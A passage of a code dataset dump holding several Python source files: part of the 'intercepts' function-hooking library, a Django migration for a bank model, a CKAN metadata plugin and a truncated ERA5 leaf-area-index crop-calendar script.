types.FunctionType, handler: types.FunctionType\r\n) -> types.FunctionType:\r\n _obj = types.FunctionType(\r\n code=obj.__code__,\r\n globals=obj.__globals__,\r\n name=obj.__name__,\r\n argdefs=obj.__defaults__,\r\n closure=obj.__closure__,\r\n )\r\n obj.__code__ = replace_load_global(handler.__code__, \"_\", _obj)\r\n\r\n _HANDLERS[get_addr(obj), type(obj)].append((obj, _obj))\r\n return obj\r\n\r\n\r\ndef _register_method(\r\n obj: types.MethodType, handler: types.FunctionType\r\n) -> types.MethodType:\r\n _register_function(obj.__func__, handler)\r\n return obj\r\n\r\n\r\ndef unregister(obj: T, depth: int | None = None) -> T:\r\n r\"\"\"Unregisters the handlers for an object.\r\n\r\n :param obj: The callable for which to unregister handlers.\r\n :param depth: (optional) The maximum number of handlers to unregister. Defaults to all.\r\n :returns: The previously intercepted callable.\r\n \"\"\"\r\n obj_type = type(obj)\r\n _unregister: dict[Type, Callable] = {\r\n types.BuiltinFunctionType: _unregister_builtin,\r\n types.FunctionType: _unregister_function,\r\n types.MethodType: _unregister_method,\r\n }\r\n if obj_type not in _unregister:\r\n raise NotImplementedError(f\"Unsupported type: {obj_type}\")\r\n _unregister[obj_type](obj, depth=depth)\r\n return obj\r\n\r\n\r\ndef _unregister_builtin_addr(addr: int, depth: int | None = None):\r\n handlers = _HANDLERS[addr, types.BuiltinFunctionType]\r\n if depth is None:\r\n depth = handlers.__len__()\r\n while handlers.__len__() and depth > 0:\r\n depth -= 1\r\n (_, dealloc), *_, _obj_bytes = handlers.pop()\r\n ctypes.memmove(\r\n addr + 2 * PTR_SIZE,\r\n _obj_bytes[2 * PTR_SIZE :],\r\n _obj_bytes.__len__() - 2 * PTR_SIZE,\r\n )\r\n dealloc()\r\n\r\n\r\ndef _unregister_builtin(obj: types.BuiltinFunctionType, depth: int | None = None):\r\n _unregister_builtin_addr(get_addr(obj), depth=depth)\r\n\r\n\r\ndef _unregister_function_addr(addr: int, depth: int | None = None):\r\n handlers = _HANDLERS[addr, types.FunctionType]\r\n if depth is None:\r\n depth = handlers.__len__()\r\n while handlers.__len__() and depth > 0:\r\n depth -= 1\r\n obj, _obj, *_ = handlers.pop()\r\n obj.__code__ = _obj.__code__\r\n\r\n\r\ndef _unregister_function(obj: types.FunctionType, depth: int | None = None):\r\n _unregister_function_addr(get_addr(obj), depth=depth)\r\n\r\n\r\ndef _unregister_method(obj: types.MethodType, depth: int | None = None):\r\n _unregister_function(obj.__func__, depth=depth)\r\n\r\n\r\n@atexit.register\r\ndef unregister_all() -> None:\r\n r\"\"\"Unregisters all handlers.\"\"\"\r\n _unregister: dict[Type, Callable] = {\r\n types.BuiltinFunctionType: _unregister_builtin_addr,\r\n types.FunctionType: _unregister_function_addr,\r\n }\r\n for addr, callable_type in _HANDLERS:\r\n _unregister[callable_type](addr)\r\n _HANDLERS.clear()\r\n","repo_name":"dlshriver/intercepts","sub_path":"intercepts/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"94"} +{"seq_id":"31817720568","text":"import django.contrib.postgres.fields\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('banks', '0011_auto_20210211_0525'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='bankcard',\n name='bank',\n ),\n migrations.RemoveField(\n model_name='banksubsidiary',\n name='bank',\n ),\n migrations.AlterModelOptions(\n name='bank',\n options={'ordering': ['-updated_at']},\n ),\n migrations.RenameField(\n model_name='bank',\n old_name='banki_url',\n new_name='url_self_banki',\n ),\n migrations.RenameField(\n model_name='bank',\n old_name='cbr_url',\n new_name='url_self_cbr',\n ),\n migrations.AddField(\n model_name='bank',\n name='agencies',\n field=models.JSONField(blank=True, help_text='Представительства', null=True),\n ),\n migrations.AddField(\n model_name='bank',\n name='cards',\n field=models.JSONField(blank=True, help_text='Сведения об эмиссии и эквайринге банковских карт', null=True),\n ),\n migrations.AddField(\n model_name='bank',\n name='subsidiaries',\n field=models.JSONField(blank=True, help_text='Филиалы', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='actual_address',\n field=models.TextField(blank=True, help_text='Адрес фактический'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='additional_offices',\n field=models.BigIntegerField(blank=True, help_text='Дополнительные офисы, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='authorized_capital',\n field=models.BigIntegerField(blank=True, help_text='Уставный капитал', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='bank_agencies',\n field=models.BigIntegerField(blank=True, help_text='Представительства, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='bank_subsidiaries',\n field=models.TextField(blank=True, help_text='Филиалы, инфа о кол-ве'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='bik',\n field=models.TextField(blank=True, help_text='БИК'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='deposit_insurance_system',\n field=models.BooleanField(blank=True, help_text='Участие в системе страхования вкладов', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='english_name',\n field=models.TextField(blank=True, help_text='Фирменное наименование на английском языке'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='full_name',\n field=models.TextField(blank=True, help_text='Полное фирменное наименование'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='info_sites',\n field=django.contrib.postgres.fields.ArrayField(base_field=models.URLField(), blank=True, help_text='Информационные сайты и страницы организации в социальных сетях', null=True, size=None),\n ),\n migrations.AlterField(\n model_name='bank',\n name='license_info',\n field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), blank=True, help_text='Лицензия (дата выдачи/последней замены)', null=True, size=None),\n ),\n migrations.AlterField(\n model_name='bank',\n name='license_info_file',\n field=models.URLField(blank=True, help_text='Лицензия файлом'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='mobile_cash_desks',\n field=models.BigIntegerField(blank=True, help_text='Передвижные пункты кассовых операций, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='name',\n field=models.TextField(blank=True, help_text='Сокращённое фирменное наименование'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='ogrn',\n field=models.TextField(blank=True, help_text='Основной государственный регистрационный номер'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='operating_cash_desks',\n field=models.BigIntegerField(blank=True, help_text='Операционные кассы вне кассового узла, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='operating_offices',\n field=models.BigIntegerField(blank=True, help_text='Операционные офисы, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='reg_number',\n field=models.TextField(blank=True, help_text='Регистрационный номер'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='registration_date',\n field=models.DateTimeField(blank=True, help_text='Дата регистрации Банком России', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='statutory_address',\n field=models.TextField(blank=True, help_text='Адрес из устава'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='tel_number',\n field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), blank=True, help_text='Телефон', null=True, size=None),\n ),\n migrations.DeleteModel(\n name='BankAgency',\n ),\n migrations.DeleteModel(\n name='BankCard',\n ),\n migrations.DeleteModel(\n name='BankSubsidiary',\n ),\n ]\n","repo_name":"brlabrussia/ml-info","sub_path":"app/banks/migrations/0012_auto_20210221_0512.py","file_name":"0012_auto_20210221_0512.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17115719247","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport json\nimport ckan.plugins as p\nimport ckanext.stcndm.logic.common as common\nimport ckanext.stcndm.logic.cubes as cubes\nimport ckanext.stcndm.logic.daily as daily\nimport ckanext.stcndm.logic.legacy as legacy\nimport ckanext.stcndm.logic.releases as releases\nimport ckanext.stcndm.logic.subjects as subjects\nimport ckanext.stcndm.logic.views as views\nimport ckanext.stcndm.logic.surveys as surveys\nfrom dateutil.parser import parse\nfrom datetime import datetime\n\nfrom ckan.lib.navl.dictization_functions import _\nfrom ckan.logic import ValidationError\nfrom ckanext.stcndm import validators\nfrom ckanext.stcndm import helpers\nfrom ckanext.scheming.helpers import (\n scheming_language_text,\n scheming_get_dataset_schema\n)\nfrom helpers import lookup_label, is_dguid\nimport unicodedata\nfrom ckanext.stcndm.model import geo\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn')\n\n\n# noinspection PyMethodMayBeStatic\nclass STCNDMPlugin(p.SingletonPlugin):\n p.implements(p.IActions)\n p.implements(p.IConfigurer)\n p.implements(p.IPackageController, inherit=True)\n p.implements(p.IValidators)\n p.implements(p.ITemplateHelpers)\n p.implements(p.IPackageController)\n p.implements(p.IRoutes)\n p.implements(p.IFacets)\n\n def update_config(self, config):\n \"\"\"\n Add configuration we need during startup\n \"\"\"\n p.toolkit.add_template_directory(config, \"templates\")\n p.toolkit.add_public_directory(config, 'public')\n\n config.update({\n # TODO: We can probably just make this dynamic? Are there\n # schemas that should *not* be imported other than presets?\n 'scheming.dataset_schemas': '\\n'.join([\n 'ckanext.stcndm:schemas/article.yaml',\n 'ckanext.stcndm:schemas/chart.yaml',\n 'ckanext.stcndm:schemas/codeset.yaml',\n 'ckanext.stcndm:schemas/conference.yaml',\n 'ckanext.stcndm:schemas/correction.yaml',\n 'ckanext.stcndm:schemas/cube.yaml',\n 'ckanext.stcndm:schemas/daily.yaml',\n 'ckanext.stcndm:schemas/dataset.yaml',\n 'ckanext.stcndm:schemas/format.yaml',\n 'ckanext.stcndm:schemas/generic.yaml',\n 'ckanext.stcndm:schemas/geodescriptor.yaml',\n 'ckanext.stcndm:schemas/indicator.yaml',\n 'ckanext.stcndm:schemas/issue.yaml',\n 'ckanext.stcndm:schemas/keyword.yaml',\n 'ckanext.stcndm:schemas/map.yaml',\n 'ckanext.stcndm:schemas/province.yaml',\n 'ckanext.stcndm:schemas/publication.yaml',\n 'ckanext.stcndm:schemas/pumf.yaml',\n 'ckanext.stcndm:schemas/service.yaml',\n 'ckanext.stcndm:schemas/subject.yaml',\n 'ckanext.stcndm:schemas/survey.yaml',\n 'ckanext.stcndm:schemas/video.yaml',\n 'ckanext.stcndm:schemas/view.yaml'\n ]),\n 'scheming.presets': '\\n'.join([\n 'ckanext.scheming:presets.json',\n 'ckanext.repeating:presets.json',\n 'ckanext.fluent:presets.json',\n 'ckanext.stcndm:schemas/presets.yaml'\n ]),\n 'ckan.search.show_all_types': 'true',\n 'search.query_fields': 'product_id_new^8 name^4 '\n 'title_{{LANG}}^4 text',\n 'search.tie': '0.0',\n 'search.sort': 'score desc, product_id_new_sort asc',\n })\n\n from ckanext.stcndm.model.geo import setup\n setup()\n\n def before_index(self, data_dict):\n \"\"\"\n customize data sent to solr\n\n :param data_dict:\n :type data_dict dict\n\n :returns dict\n \"\"\"\n dataset_schema = scheming_get_dataset_schema(data_dict.get('type'))\n if dataset_schema is None:\n raise ValidationError((_(\n 'Found no schema for following datasets:\\n{dump}'.format(\n dump=json.dumps(data_dict, indent=2, sort_keys=True)\n )\n ),))\n\n field_schema = dict(\n (s['field_name'], s) for s in dataset_schema['dataset_fields']\n )\n\n index_data_dict = data_dict.copy()\n for k in data_dict:\n if k.startswith(u'extras_'):\n index_data_dict.pop(k, None)\n\n authors = []\n default_date = datetime(1, 1, 1, 8, 30, 0, 0)\n\n validated_data_dict = json.loads(data_dict['validated_data_dict'])\n\n name = validated_data_dict.get(u'name')\n\n # append dguids from the datastore\n if validated_data_dict.get(u'product_id_new'):\n index_data_dict[u'dguid_codes'] = []\n for dguid_pkg_id in geo.get_geodescriptors_for_package(\n validated_data_dict[u'product_id_new']):\n index_data_dict[u'dguid_codes'].append(\n helpers.get_dguid_from_pkg_id(dguid_pkg_id))\n # strip the vintages from dguids to get geodescriptors\n index_data_dict[u'geodescriptor_codes'] = \\\n [g[4:] if is_dguid(g) else g\n for g in index_data_dict[u'dguid_codes'] if g]\n\n for item, value in validated_data_dict.iteritems():\n fs = field_schema.get(item)\n\n # Do not index any field that is not currently in the schema.\n if not fs:\n continue\n\n field_type = fs.get('schema_field_type', 'string')\n # TODO: we're not using the multivalued schema field. Drop it?\n multivalued = fs.get('schema_multivalued', False)\n\n # Legacy issues numbers are non-numeric, which is problematic\n # for sorting and external tools. We can't just use a Solr\n # directive, as it'll fail entirely on a bad value.\n if name == 'issue_number':\n if value.isdigit():\n index_data_dict['issue_number_int'] = int(value)\n\n # Fluent (multilingual) fields are really dictionaries, where\n # each key is the ISO language code, and the value the translated\n # text. We need to unpack these into individual solr fields\n # for per-language search.\n if field_type == 'fluent':\n if isinstance(value, dict):\n index_data_dict.update(\n (u'{0}_{1}'.format(item, k), v)\n for k, v in value.iteritems()\n )\n else:\n raise ValidationError((_(\n '{name}: Expecting a fluent dict for {item}, '\n 'instead got {value!r}'.format(\n name=name,\n item=item,\n value=value\n )\n ), ))\n\n # Numeric foreign keys that need to be looked up to retrieve\n # their multilingual labels for searching.\n elif field_type == u'code':\n index_data_dict[unicode(item)] = value\n\n # These codes can refer to a codeset (a dataset of type\n # 'codeset' with a particular key), a preset (a hardcoded\n # value in a Scheming schema), or another dataset (lookup).\n lookup_type = fs.get(u'lookup', '')\n if lookup_type == u'codeset':\n lookup = fs.get(u'codeset_type', '')\n elif lookup_type == u'preset':\n lookup = fs.get(u'preset', '')[4:]\n else:\n lookup = fs.get(u'lookup', '')\n\n if not lookup:\n raise ValidationError((_(\n '{name}: unable to determine lookup '\n 'for {item}'.format(\n name=name,\n item=item\n )\n ), ))\n\n if isinstance(value, list):\n for value_to_lookup in value:\n if not value_to_lookup:\n continue\n\n desc = lookup_label(\n lookup,\n value_to_lookup,\n lookup_type\n )\n\n for k, v in desc.iteritems():\n if v and not k == u'found':\n n = u'{item}_desc_{key}'.format(\n item=item,\n key=k\n )\n index_data_dict.update(\n {n: index_data_dict.get(n, []) + [v]}\n )\n\n else:\n desc = lookup_label(lookup, value, lookup_type)\n\n index_data_dict.update((\n u'{item}_desc_{key}'.format(\n item=item,\n key=k\n ), v)\n for k, v in desc.iteritems() if v and not k == u'found'\n )\n if item == u'geodescriptor_codes':\n index_data_dict[u'dguid_codes'] = \\\n list(index_data_dict[u'geodescriptor_codes'])\n elif field_type == 'date':\n try:\n date = parse(value, default=default_date)\n index_data_dict[unicode(item)] = unicode(\n date.isoformat()[:19] + u'Z'\n )\n except ValueError:\n continue\n elif item.endswith('_authors'):\n index_data_dict[unicode(item)] = value\n authors.extend(value)\n else:\n index_data_dict[unicode(item)] = value\n\n if authors:\n index_data_dict['authors'] = authors\n index_data_dict['authors_initials'] = list(\n set(\n [strip_accents(i[0]).upper() for i in authors]\n )\n )\n\n return index_data_dict\n\n def after_create(self, context, data):\n if 'model' in context:\n # We need to force a commit to get the metadata_modified\n # and metadata_created columns. It is *not* enough for us to\n # simply set these ourselves. This is caused by after_create\n # being called long before creation is actually complete.\n context['model'].repo.commit()\n\n if context.get('__cloning'):\n # We don't want to call this while we're cloning, or we'll\n # end up with duplicate release records.\n return\n\n product_id_new = data.get('product_id_new')\n if data['type'] == 'format':\n product_id_new = data.get('format_id')\n\n if not product_id_new:\n return\n\n helpers.ensure_release_exists(product_id_new, context=context)\n\n def get_actions(self):\n # Some Java web clients require the web service to use Pascal Case\n return {\n \"GetAutocomplete\": common.get_autocomplete,\n \"GetInternalAuthors\": common.get_internal_authors,\n \"DeleteProduct\": common.delete_product,\n \"EnsureReleaseExists\": releases.ensure_release_exists,\n \"GetBookableProducts\": daily.get_bookable_releases,\n \"GetCubeList\": cubes.get_cube_list_by_subject,\n \"GetCube\": cubes.get_cube,\n \"UpdateCube\": cubes.update_cube,\n \"GetNextCubeId\": cubes.get_next_cube_id,\n \"GetNextNonDataProductId\": common.get_next_non_data_product_id,\n \"CreateOrUpdateCubeRelease\": cubes.create_or_update_cube_release,\n \"GetThemes\": daily.get_themes,\n \"GetDailyList\": daily.get_daily_list,\n \"GetDefaultViews\": daily.get_default_views,\n \"GetDerivedProductList\": common.get_derived_product_list,\n \"GetFormatDescription\": common.get_format_description,\n \"GetLastPublishStatus\": common.get_last_publish_status,\n \"GetNextProductId\": common.get_next_product_id,\n \"GetNextLegacyArticleId\": legacy.get_next_legacy_article_id,\n \"GetNextLegacyProductId\": legacy.get_next_legacy_product_id,\n \"GetProduct\": common.get_product,\n \"GetProductIssueArticles\": daily.get_product_issue_articles,\n \"GetProductIssues\": daily.get_product_issues,\n \"GetProductType\": common.get_product_type,\n \"GetReleasesForProduct\": releases.get_releases_for_product,\n \"GetSubject\": subjects.get_subject,\n \"GetSubjectList\": subjects.get_top_level_subject_list,\n \"GetSurveySubjectCodes\": surveys.get_survey_subject_codes,\n \"GetUpcomingReleases\": common.get_upcoming_releases,\n \"GetIssuesByPubStatus\": common.get_issues_by_pub_status,\n \"GetProductFormats\": daily.get_product_formats,\n \"GetProductUrl\": common.get_product_url,\n \"GetProductsBySurvey\": surveys.get_products_by_survey,\n \"PurgeDataset\": common.purge_dataset,\n \"RegisterCube\": cubes.register_cube,\n \"RegisterDaily\": daily.register_daily,\n \"RegisterDataProduct\": common.register_data_product,\n \"RegisterNonDataProduct\": common.register_non_data_product,\n \"RegisterLegacyNonDataProduct\":\n legacy.register_legacy_non_data_product,\n \"RegisterProduct\": common.register_data_product,\n \"RegisterSurvey\": surveys.register_survey,\n \"UpdateDefaultView\": views.update_default_view,\n \"UpdateReleaseDateAndStatus\":\n common.update_release_date_and_status,\n \"UpdateProductGeo\": common.update_product_geo,\n \"UpdatePublishingStatus\": common.update_last_publish_status,\n \"GetDatasetSchema\": common.get_dataset_schema,\n \"GetGroupSchema\": common.get_group_schema,\n \"GetSurveyCodesets\": surveys.get_survey_codesets,\n \"GetSubjectCodesets\": subjects.get_subject_codesets,\n \"GetProductsByFRC\": daily.get_products_by_frc,\n \"ConsumeTransactionFile\": releases.consume_transaction_file\n }\n\n def get_validators(self):\n return {\n \"apply_archive_rules\": validators.apply_archive_rules,\n \"archive_children_of_cube\": validators.archive_children_of_cube,\n \"codeset_create_name\": validators.codeset_create_name,\n \"codeset_multiple_choice\": validators.codeset_multiple_choice,\n \"correction_create_name\": validators.correction_create_name,\n \"create_product_id\": validators.create_product_id,\n \"daily_create_name\": validators.daily_create_name,\n \"set_default_value\": validators.set_default_value,\n \"format_create_name\": validators.format_create_name,\n \"format_create_id\": validators.format_create_id,\n \"geodescriptor_create_name\": validators.geodescriptor_create_name,\n \"keyword_create_name\": validators.keyword_create_name,\n \"ndm_str2boolean\": validators.ndm_str2boolean,\n \"ndm_tag_name_validator\": validators.ndm_tag_name_validator,\n \"ndm_child_inherits_value\": validators.ndm_child_inherits_value,\n \"province_create_name\": validators.province_create_name,\n \"product_create_name\": validators.product_create_name,\n \"shortcode_validate\": validators.shortcode_validate,\n \"shortcode_output\": validators.shortcode_output,\n \"subject_create_name\": validators.subject_create_name,\n \"survey_create_name\": validators.survey_create_name,\n \"repeating_text_delimited\": validators.repeating_text_delimited,\n }\n\n def get_helpers(self):\n return {\n \"codeset_choices\": helpers.codeset_choices,\n \"lookup_label\": helpers.lookup_label,\n \"get_dataset_types\": helpers.get_dataset_types,\n \"get_parent_content_types\": helpers.get_parent_content_types,\n \"set_previous_issue_archive_date\":\n helpers.set_previous_issue_archive_date,\n 'ensure_release_exists': helpers.ensure_release_exists,\n 'get_parent_dataset': helpers.get_parent_dataset,\n 'get_child_datasets': helpers.get_child_datasets,\n 'x2list': helpers.x2list,\n 'set_related_id': helpers.set_related_id,\n 'changes_since': helpers.changes_since,\n 'get_geolevel': helpers.get_geolevel,\n 'get_dguid_from_pkg_id': helpers.get_dguid_from_pkg_id,\n }\n\n def before_view(self, pkg_dict):\n \"\"\"\n Ensure that (if available) the correct language strings\n are used for core CKAN fields.\n \"\"\"\n fields_to_fluent = (\n u'title',\n u'notes'\n )\n\n for field in fields_to_fluent:\n if field in pkg_dict and isinstance(pkg_dict[field], dict):\n pkg_dict[field] = scheming_language_text(pkg_dict[field])\n\n return pkg_dict\n\n def before_map(self, map):\n map.connect(\n 'clone',\n '/dataset/clone/{ds_id}',\n controller=(\n 'ckanext.stcndm.controllers.clone'\n ':CloneDatasetController'\n ),\n action='clone'\n )\n\n map.connect(\n 'child_dataset',\n '/dataset/{ds_id}/child/{ds_type}/new',\n controller=(\n 'ckanext.stcndm.controllers.child_dataset'\n ':ChildDatasetController'\n ),\n action='new'\n )\n\n map.connect(\n 'solr_proxy',\n '/solr/select',\n controller=(\n 'ckanext.stcndm.controllers.solr_proxy'\n ':SolrProxyController'\n ),\n action='select'\n )\n\n map.connect(\n 'schema_to_xl',\n '/schema_to_xl/dump',\n controller=(\n 'ckanext.stcndm.controllers.schema_to_xl'\n ':SchemaToXlController'\n ),\n action='dump'\n )\n\n return map\n\n def after_map(self, map):\n # Required since we implement IRoutes.\n return map\n\n def dataset_facets(self, facets_dict, package_type):\n return facets_dict\n\n def organization_facets(self, facets_dict, organization_type,\n package_type):\n # We always want the dataset type selector to appear.\n # Currently, groups, organizations, licence type, etc... do not\n # apply to ndm, so lets clear the default fields as well.\n facets_dict.clear()\n facets_dict['dataset_type'] = _('Dataset Type')\n return facets_dict\n\n def group_facets(self, facets_dict, group_type, package_type):\n return facets_dict\n","repo_name":"open-data/ckanext-stcndm","sub_path":"ckanext/stcndm/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":19146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25756921999","text":"import xarray as xr\nimport xesmf as xe\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy\nimport statsmodels.api as sm\nimport cartopy\nimport cartopy.crs as ccrs\nimport glob\nimport sys\nimport datetime\n\ndirERA5Land = '/home/edcoffel/drive/MAX-Filer/Research/Climate-02/Data-02-edcoffel-F20/ERA5-Land'\ndirERA5 = '/home/edcoffel/drive/MAX-Filer/Research/Climate-02/Data-02-edcoffel-F20/ERA5'\ndirSacks = '/home/edcoffel/drive/MAX-Filer/Research/Climate-01/Personal-F20/edcoffel-F20/data/projects/ag-land-climate'\n\nfile_var1 = 'lai_low'\nfile_var2 = 'lai_high'\norig_var1 = 'lai_lv'\norig_var2 = 'lai_hv'\ncrop = 'Maize'\n\nyear = int(sys.argv[1])\n\nlatRange = [-90, 90]\nlonRange = [0, 360]\n\n\n# LOADING SACKS CROP CALENDARS\nsacksMaizeNc = xr.open_dataset('%s/sacks/%s.crop.calendar.fill.nc'%(dirSacks, crop))\nsacksStart = sacksMaizeNc['plant'].values\nsacksStart = np.roll(sacksStart, -int(sacksStart.shape[1]/2), axis=1)\nsacksStart[sacksStart < 0] = np.nan\nsacksEnd = sacksMaizeNc['harvest'].values\nsacksEnd = np.roll(sacksEnd, -int(sacksEnd.shape[1]/2), axis=1)\nsacksEnd[sacksEnd < 0] = np.nan\n\n# THESE ARE THE LAT/LON GRIDS THAT SACKS IS ON\nsacksLat = np.linspace(90, -90, 360)\nsacksLon = np.linspace(0, 360, 720)\n\nregridMesh_cur_model = xr.Dataset()\n\n# regrid sacks data to current model res\nregridMesh_cur_model = xr.Dataset({'lat': (['lat'], sacksLat),\n 'lon': (['lon'], sacksLon)})\n\nn = 0\n\n# load low vegetaion cover\nera5_low_veg = xr.open_dataset('%s/monthly/low_vegetation_cover.nc'%dirERA5)\n\nera5_low_veg = era5_low_veg.rename_dims(latitude='lat', longitude='lon')\nera5_low_veg = era5_low_veg.rename({'latitude':'lat', 'longitude':'lon'})\n\nera5_low_veg = era5_low_veg.isel(time=0,expver=0)\nera5_low_veg.load()\n\nera5_low_veg = era5_low_veg.drop('expver')\nera5_low_veg = era5_low_veg.drop('time')\n\nregridder_low_veg = xe.Regridder(xr.DataArray(data=era5_low_veg.cvl, dims=['lat', 'lon'], coords={'lat':era5_low_veg.lat, 'lon':era5_low_veg.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nera5_low_veg = regridder_low_veg(era5_low_veg)\n\n# and load high veg cover\nera5_high_veg = xr.open_dataset('%s/monthly/high_vegetation_cover.nc'%dirERA5)\n\nera5_high_veg = era5_high_veg.rename_dims(latitude='lat', longitude='lon')\nera5_high_veg = era5_high_veg.rename({'latitude':'lat', 'longitude':'lon'})\n\nera5_high_veg = era5_high_veg.isel(time=0,expver=0)\nera5_high_veg.load()\n\nera5_high_veg = era5_high_veg.drop('expver')\nera5_high_veg = era5_high_veg.drop('time')\n\nregridder_high_veg = xe.Regridder(xr.DataArray(data=era5_high_veg.cvh, dims=['lat', 'lon'], coords={'lat':era5_high_veg.lat, 'lon':era5_high_veg.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nera5_high_veg = regridder_high_veg(era5_high_veg)\n\n\n# LOAD 1 YEAR OF ERA5 DATA\nprint('opening era5 %d...'%year)\nlai_low_era5 = xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var1, year))\nlai_low_era5.load()\n\nlai_high_era5 = xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var2, year))\nlai_high_era5.load()\n\nprint('opening era5 %d...'%(year-1))\nlai_low_era5_last_year = xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var1, year-1))\nlai_low_era5_last_year.load()\n\nlai_high_era5_last_year = xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var2, year-1))\nlai_high_era5_last_year.load()\n\nlai_low_era5 = lai_low_era5.rename_dims(latitude='lat', longitude='lon')\nlai_low_era5 = lai_low_era5.rename({'latitude':'lat', 'longitude':'lon'})\n\nlai_high_era5 = lai_high_era5.rename_dims(latitude='lat', longitude='lon')\nlai_high_era5 = lai_high_era5.rename({'latitude':'lat', 'longitude':'lon'})\n\nlai_low_era5_last_year = lai_low_era5_last_year.rename_dims(latitude='lat', longitude='lon')\nlai_low_era5_last_year = lai_low_era5_last_year.rename({'latitude':'lat', 'longitude':'lon'})\n\nlai_high_era5_last_year = lai_high_era5_last_year.rename_dims(latitude='lat', longitude='lon')\nlai_high_era5_last_year = lai_high_era5_last_year.rename({'latitude':'lat', 'longitude':'lon'})\n\n# THIS USES XESMF TO REGRID THE SACKS DATA TO ERA5 RES\n\n\nregridder_lai_low = xe.Regridder(xr.DataArray(data=lai_low_era5[orig_var1], dims=['time', 'lat', 'lon'], coords={'lat':lai_low_era5.lat, 'lon':lai_low_era5.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nregridder_lai_high = xe.Regridder(xr.DataArray(data=lai_high_era5[orig_var2], dims=['time', 'lat', 'lon'], coords={'lat':lai_high_era5.lat, 'lon':lai_high_era5.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nregridder_lai_low_last_year = xe.Regridder(xr.DataArray(data=lai_low_era5_last_year[orig_var1], dims=['time', 'lat', 'lon'], coords={'lat':lai_low_era5_last_year.lat, 'lon':lai_low_era5_last_year.lon}), \\\n regridMesh_cur_model, 'bilinear', reuse_weights=True)\nregridder_lai_high_last_year = xe.Regridder(xr.DataArray(data=lai_high_era5_last_year[orig_var2], dims=['time', 'lat', 'lon'], coords={'lat':lai_high_era5_last_year.lat, 'lon':lai_high_era5_last_year.lon}), \\\n regridMesh_cur_model, 'bilinear', reuse_weights=True)\n\nlai_low_era5 = regridder_lai_low(lai_low_era5)\nlai_high_era5 = regridder_lai_high(lai_high_era5)\nlai_low_era5_last_year = regridder_lai_low_last_year(lai_low_era5_last_year)\nlai_high_era5_last_year = regridder_lai_high_last_year(lai_high_era5_last_year)\n\n# count up all non-nan grid cells so we can estimate percent complete\nngrid = 0\nfor xlat in range(lai_low_era5.lat.size):\n for ylon in range(lai_low_era5.lon.size):\n \n if not np.isnan(sacksStart[xlat, ylon]):\n curStart = datetime.datetime.strptime('2020%d'%(round(sacksStart[xlat, ylon])+1), '%Y%j').date().month\n sacksStart[xlat, ylon] = curStart-1\n \n if not np.isnan(sacksEnd[xlat, ylon]):\n curEnd = datetime.datetime.strptime('2020%d'%(round(sacksEnd[xlat, ylon])+1), '%Y%j').date().month\n sacksEnd[xlat, ylon] = curEnd-1\n \n if ~np.isnan(sacksStart[xlat, ylon]) and ~np.isnan(sacksEnd[xlat, ylon]):\n ngrid += 1\n\n\nyearly_grow_lai_low_mean = np.full([lai_low_era5.lat.size, lai_low_era5.lon.size], np.nan)\nyearly_grow_lai_high_mean = np.full([lai_high_era5.lat.size, lai_high_era5.lon.size], np.nan)\n \n \n# THIS LOOPS OVER EVERY GRID CELL OF ERA5 AND EXTRACTS DAILY ERA5 DATA THAT FALLS WITHIN THE SACKS GROWING SEASON\n# latitude loop\nfor xlat in range(lai_low_era5.lat.size):\n # longitude loop\n for ylon in range(lai_low_era5.lon.size):\n\n # if sacks calendar is defined at this grid cell\n if ~np.isnan(sacksStart[xlat, ylon]) and ~np.isnan(sacksEnd[xlat, ylon]):\n \n # just print out our progress\n if n % 1000 == 0:\n print('%.2f%%'%(n/ngrid*100))\n\n # there are 2 possibilities - that the planting date is before the harvest date in the current year (northern hemisphere), \n # or that the planting date is late in the year and the harvest date is in the beginning of the next year (southern hemisphere)\n # we need to handle these two cases separately\n \n # SOUTHERN HEMISPHERE - NEED 2 YEARS OF ERA5 DATA (this year and last year)\n if sacksStart[xlat, ylon] > sacksEnd[xlat, ylon]:\n\n # start loop on 2nd year to allow for growing season that crosses jan 1\n cur_lai_low1 = lai_low_era5_last_year[orig_var1][int(sacksStart[xlat, ylon]):, xlat, ylon]\n cur_lai_low2 = 